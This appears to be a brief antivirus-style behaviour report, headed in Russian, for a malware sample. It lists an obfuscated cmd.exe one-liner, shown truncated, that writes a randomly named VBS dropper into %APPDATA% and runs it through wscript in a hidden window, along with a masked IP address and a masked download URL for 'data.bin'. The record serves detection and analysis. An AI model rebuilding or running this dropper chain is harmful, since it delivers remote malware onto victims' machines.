Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "V2r2Y=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM GHOs5z" "SuB Vs(Iz)" "MZ6hdL=88" "Dim O6C" "Nwn=90" "O6C=TImER+Iz" "dO whiLE tImeR<O6C" "loOp" "Bk6yirv=95" "ENd SUb" "sUb A8()" "FR...
- %APPDATA%\8049.vbs
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\8049.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "V2r2Y=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM GHOs5z" "SuB Vs(Iz)" "MZ6hdL=88" "Dim O6C" "Nwn=90" "O6C=TImER+Iz" "dO whiLE tImeR<O6C" "loOp" "Bk6yirv=95" "ENd SUb" "sUb A8()" "FR...' (со скрытым окном)